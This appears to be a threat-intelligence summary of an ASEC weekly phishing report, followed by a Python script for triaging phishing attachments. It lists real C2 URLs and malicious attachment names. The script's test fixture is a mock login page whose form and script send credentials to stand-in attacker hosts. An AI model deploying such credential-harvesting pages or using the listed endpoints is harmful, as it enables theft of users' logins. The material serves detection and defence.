ASEC Weekly Phishing Email Threat Trends (January 1st, 2023 – January 7th, 2023) – ASEC BLOG

ASEC’s weekly phishing threat analysis for Jan 1–7, 2023 shows phishing email attachments as the dominant attack vector, with FakePage pages designed to harvest credentials, followed by Worm, Infostealer, and Downloader campaigns. The report also highlights MOTW-based bypass techniques, attacker C2 URLs, and practical user guidance to prevent infection from phishing emails.
#FakePage #MOTW #AgentTesla #FormBook #Remcos #cortinasdivinas #masjidsalaam #formspree #gojobs

Keypoints

  • FakePage attachments dominated phishing activity at 58% of the observed cases.
  • Worm was the second-most prevalent at 15%, notable for using SMTP to mass-distribute emails.
  • Infostealer and downloader each accounted for 8%; AgentTesla and FormBook are cited as examples of infostealers, Remcos as a downloader.
  • Ransomware (7%) and Trojan (4%) were also detected among phishing attachments.
  • Compressed file variants (RAR/ZIP, etc.) comprised about 43% of attachment types.
  • The report notes MOTW (Mark-of-the-Web) bypass techniques and suggests using archivers that propagate MOTW to extracted files to curb infection.

MITRE Techniques

  • [T1598] Phishing for Information – Reconnaissance – Used to obtain credentials via fake login pages; “When users enter their IDs and passwords on the login pages among the FakePages created by the threat actor, their information is sent to the attacker’s server.”
  • [T1566] Phishing – Initial Access – Delivery via phishing emails with attachments carrying malware; “Phishing (Initial Access, ID: T1566)”
  • [T1534] Internal Spearphishing – Lateral Movement – Targeted internal phishing that facilitates movement within an organization; “Internal Spearphishing (Lateral Movement, ID: T1534)”

Indicators of Compromise

  • [URL] Fake Page C2 addresses used to exfiltrate credentials – hxxps://cortinasdivinas.com/wp-admin/NEW/anydomain.php, hxxps://masjidsalaam.co.ke/wp-project/anydomain.php
  • [URL] Additional C2/phishing-related URLs mentioned – hxxps://formspree.io/f/xdovnyrz, hxxps://gojobs.in/xzx/dhl.php
  • [File Name] Attachments observed in cases – Original-invoice_username.htm, Shipment-AWB-6588476487.html
  • [File Name] Malware payloads and risky attachments – Aviso de pago.pdf.img, PE22142554.rar, wild-imgs.jpg.exe, privateimg.jpg.scr
  • [File Extension] Notable extensions observed – RAR, EXE, SCR, PDF
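The two attachment patterns the report describes, FakePage HTML files whose login form posts the typed credentials to an attacker-controlled server and disguised payloads such as `wild-imgs.jpg.exe` or `Aviso de pago.pdf.img`, can both be caught with a small mail-gateway triage check. The following is an added example written for this summary, not code from ASEC or the report: it flags double-extension and container attachments, and parses HTML attachments for password fields whose form action or script URLs point at a host outside an allowlist. The allowlist, the sample HTML and the hostnames in it (`attacker.example`, `collector.example`) are constructed for the example.

```python
"""Phishing-attachment triage (added example, not ASEC's code).

Check 1: filename disguises - a decoy extension followed by an executable or
         disk-image suffix (e.g. "photo.jpg.exe", "invoice.pdf.img").
Check 2: HTML "FakePage" attachments - a password field plus a form action or
         script URL that sends data to a host not on the allowlist.
All sample inputs are constructed for this example.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

EXECUTABLE_SUFFIXES = {"exe", "scr", "pif", "com", "bat", "cmd", "js", "vbs", "hta"}
CONTAINER_SUFFIXES = {"img", "iso", "vhd", "vhdx"}     # mounted, contents may lack MOTW
ARCHIVE_SUFFIXES = {"rar", "zip", "7z"}                 # MOTW only survives with a propagating archiver
DECOY_SUFFIXES = {"pdf", "jpg", "jpeg", "png", "doc", "docx", "xls", "xlsx", "txt"}
URL_RE = re.compile(r"https?://[^\s'\"<>()]+")


def classify_filename(name):
    """Return a list of findings for an attachment filename."""
    parts = name.lower().rsplit(".", 2)
    findings = []
    if len(parts) == 3:                      # stem.decoy.real
        _, decoy, real = parts
        if decoy in DECOY_SUFFIXES and real in EXECUTABLE_SUFFIXES:
            findings.append("double-extension executable")
        elif decoy in DECOY_SUFFIXES and real in CONTAINER_SUFFIXES:
            findings.append("double-extension disk image")
    last = parts[-1]
    if last in EXECUTABLE_SUFFIXES:
        findings.append("executable attachment")
    elif last in CONTAINER_SUFFIXES:
        findings.append("disk image: contents may open without MOTW")
    elif last in ARCHIVE_SUFFIXES:
        findings.append("compressed archive: extract only with a MOTW-propagating archiver")
    elif last in {"htm", "html"}:
        findings.append("html attachment: inspect for credential forms")
    return findings


class FakePageScanner(HTMLParser):
    """Collects form actions, password inputs and URLs found inside <script>."""

    def __init__(self):
        super().__init__()
        self.form_actions, self.script_urls = [], []
        self.has_password_field = False
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form" and a.get("action"):
            self.form_actions.append(a["action"])
        if tag == "input" and (a.get("type") or "").lower() == "password":
            self.has_password_field = True
        if tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:                  # script bodies arrive via handle_data
            self.script_urls.extend(URL_RE.findall(data))


def scan_html(html, allowed_hosts=()):
    """Flag HTML that captures a password and sends it to a non-allowlisted host."""
    p = FakePageScanner()
    p.feed(html)
    hosts = {urlparse(u).hostname for u in p.form_actions + p.script_urls}
    external = sorted(h for h in hosts if h and h not in allowed_hosts)
    return {"password_field": p.has_password_field,
            "exfil_hosts": external,
            "suspicious": p.has_password_field and bool(external)}


def triage_attachment(name, content=None, allowed_hosts=()):
    """Combine both checks for one attachment; content is only read for HTML."""
    findings = classify_filename(name)
    result = {"name": name, "findings": findings}
    if name.lower().endswith((".htm", ".html")) and content is not None:
        result["html"] = scan_html(content, allowed_hosts)
        if result["html"]["suspicious"]:
            findings.append("credential form posting to external host")
    return result


# Constructed sample inputs (not taken from the report).
SAMPLE_FAKEPAGE = """<html><body>
<form id="login" method="post" action="https://attacker.example/anydomain.php">
  <input name="email" value="victim@corp.example">
  <input name="password" type="password">
  <button type="submit">Sign in</button>
</form>
<script>
  document.getElementById('login').onsubmit = function () {
    fetch('https://collector.example/submit', {method: 'POST'});
  };
</script></body></html>"""
SAMPLE_BENIGN = """<html><body><p>Your parcel arrives Tuesday.</p>
<a href="https://tracking.corp.example/awb">Track</a></body></html>"""

if __name__ == "__main__":
    for name, body in [("Original-invoice_username.htm", SAMPLE_FAKEPAGE),
                       ("Shipment-AWB-6588476487.html", SAMPLE_BENIGN),
                       ("Aviso de pago.pdf.img", None), ("PE22142554.rar", None),
                       ("wild-imgs.jpg.exe", None), ("privateimg.jpg.scr", None)]:
        print(triage_attachment(name, body))
```

The HTML check deliberately ignores plain `href` links and only counts form actions and script-embedded URLs, since a FakePage needs one of those to deliver the typed credentials; pair it with an allowlist of your own login hosts so legitimate internal forms are not flagged.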

Read more: https://asec.ahnlab.com/en/45693/